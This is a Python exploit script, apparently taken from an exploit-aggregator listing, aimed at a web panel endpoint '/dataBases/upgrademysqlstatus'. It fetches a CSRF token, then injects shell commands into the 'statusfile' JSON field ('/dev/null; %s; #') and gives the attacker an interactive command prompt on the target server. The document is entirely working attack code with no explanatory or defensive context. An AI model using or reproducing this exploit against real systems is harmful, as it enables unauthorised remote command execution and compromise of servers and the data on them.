Share
## https://sploitus.com/exploit?id=PACKETSTORM:182539
import httpx   
import sys   
  
def get_CSRF_token(client):  
resp = client.get("/")  
  
return resp.cookies['csrftoken']  
  
def pwn(client, CSRF_token, cmd):  
headers = {  
"X-CSRFToken": CSRF_token,  
"Content-Type":"application/json",  
"Referer": str(client.base_url)  
}  
  
payload = '{"statusfile":"/dev/null; %s; #","csrftoken":"%s"}' % (cmd, CSRF_token)  
  
return client.put("/dataBases/upgrademysqlstatus", headers=headers, data=payload).json()["requestStatus"]  
  
def exploit(client, cmd):  
CSRF_token = get_CSRF_token(client)  
stdout = pwn(client, CSRF_token, cmd)  
print(stdout)  
  
if __name__ == "__main__":  
target = sys.argv[1]  
  
client = httpx.Client(base_url=target, verify=False)  
while True:  
cmd = input("$> ")  
  
exploit(client, cmd)